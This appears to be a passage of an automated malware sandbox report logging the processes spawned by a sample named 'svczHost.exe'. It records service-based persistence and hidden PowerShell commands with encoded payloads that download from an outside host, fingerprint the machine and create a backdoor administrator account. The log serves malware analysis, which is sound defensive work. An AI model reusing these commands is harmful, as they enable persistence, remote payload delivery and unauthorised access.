        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /k "st^ar^t /m^in "" p^ow^ersh^ell -w h^id^d^e^n -nolo^go -no^p -ep by^p^as^s -en^c^o^dedc^o^m^ma^n^d "sqbfafgaiaaoafsavabfafgadaauaeuabgbjae8arabjag4arwbdadoaogbvafqarga4ac4arwblahqauwbuafiasqbuagcakaaoagkadwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataazae4anqbzag4aqgbqaciakqapackakqauaematwbuafqarqboahqakqapaa=="" && exit
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -nologo -nop -ep bypass -encodedcommand "sqbfafgaiaaoafsavabfafgadaauaeuabgbjae8arabjag4arwbdadoaogbvafqarga4ac4arwblahqauwbuafiasqbuagcakaaoagkadwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataazae4anqbzag4aqgbqaciakqapackakqauaematwbuafqarqboahqakqapaa=="
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8amabladiayga1adqamgbkagqazqa1adiamwawagqaoqa5adeamqayadmaywbmadeanwawaduamqayagiamaayadianqbhaguaoabjadmanwazagqanga2agmaoaawadmaoabmadaamqa2adyanwa5adaanqa1agyanabkaduamgayadkazga4agqanqbhagmamqbkagyamqbhagyazaayadiaoqa4adaanga1adkamwbhadianabhadaanwa0adcanqbjadmamwawagmazqbkadmanqa3aguanqbiadyamgbjageamqa0adcaoqa0agyaywa5adaaywbmadkayga1agiamqa4adeamwawagiayga3aduazqawadiaywa2agiayqaxaguanwa5admaoaawadcazgbiadyayqa5adyaoqbkagqanqa4agyayqbjadgayqa1agyamgbmadyamgbhadkanaa2adkazabjadyaoaaxadyamga3agyamwbkadcangbmadqamqbmagiamga1adqaoabmadgamqawageamgayadkanwbladqamqa0agqangbjadkayqbiadkanga2aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvah
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8amabladiayga1adqamgbkagqazqa1adiamwawagqaoqa5adeamqayadmaywbmadeanwawaduamqayagiamaayadianqbhaguaoabjadmanwazagqanga2agmaoaawadmaoabmadaamqa2adyanwa5adaanqa1agyanabkaduamgayadkazga4agqanqbhagmamqbkagyamqbhagyazaayadiaoqa4adaanga1adkamwbhadianabhadaanwa0adcanqbjadmamwawagmazqbkadmanqa3aguanqbiadyamgbjageamqa0adcaoqa0agyaywa5adaaywbmadkayga1agiamqa4adeamwawagiayga3aduazqawadiaywa2agiayqaxaguanwa5admaoaawadcazgbiadyayqa5adyaoqbkagqanqa4agyayqbjadgayqa1agyamgbmadyamgbhadkanaa2adkazabjadyaoaaxadyamga3agyamwbkadcangbmadqamqbmagiamga1adqaoabmadgamqawageamgayadkanwbladqamqa0agqangbjadkayqbiadkanga2aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -nologo -nop -ep bypass -encodedcommand "sqbfafgaiaaoafsavabfafgadaauaeuabgbjae8arabjag4arwbdadoaogbvafqarga4ac4arwblahqauwbuafiasqbuagcakaaoagkadwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataazae4anqbzag4aqgbqaciakqapackakqauaematwbuafqarqboahqakqapaa==" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8amabladiayga1adqamgbkagqazqa1adiamwawagqaoqa5adeamqayadmaywbmadeanwawaduamqayagiamaayadianqbhaguaoabjadmanwazagqanga2agmaoaawadmaoabmadaamqa2adyanwa5adaanqa1agyanabkaduamgayadkazga4agqanqbhagmamqbkagyamqbhagyazaayadiaoqa4adaanga1adkamwbhadianabhadaanwa0adcanqbjadmamwawagmazqbkadmanqa3aguanqbiadyamgbjageamqa0adcaoqa0agyaywa5adaaywbmadkayga1agiamqa4adeamwawagiayga3aduazqawadiaywa2agiayqaxaguanwa5admaoaawadcazgbiadyayqa5adyaoqbkagqanqa4agyayqbjadgayqa1agyamgbmadyamgbhadkanaa2adkazabjadyaoaaxadyamga3agyamwbkadcangbmadqamqbmagiamga1adqaoabmadgamqawageamgayadkanwbladqamqa0agqangbjadkayqbiadkanga2aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8amabladiayga1adqamgbkagqazqa1adiamwawagqaoqa5adeamqayadmaywbmadeanwawaduamqayagiamaayadianqbhaguaoabjadmanwazagqanga2agmaoaawadmaoabmadaamqa2adyanwa5adaanqa1agyanabkaduamgayadkazga4agqanqbhagmamqbkagyamqbhagyazaayadiaoqa4adaanga1adkamwbhadianabhadaanwa0adcanqbjadmamwawagmazqbkadmanqa3aguanqbiadyamgbjageamqa0adcaoqa0agyaywa5adaaywbmadkayga1agiamqa4adeamwawagiayga3aduazqawadiaywa2agiayqaxaguanwa5admaoaawadcazgbiadyayqa5adyaoqbkagqanqa4agyayqbjadgayqa1agyamgbmadyamgbhadkanaa2adkazabjadyaoaaxadyamga3agyamwbkadcangbmadqamqbmagiamga1adqaoabmadgamqawageamgayadkanwbladqamqa0agqangbjadkayqbiadkanga2aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagadJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaq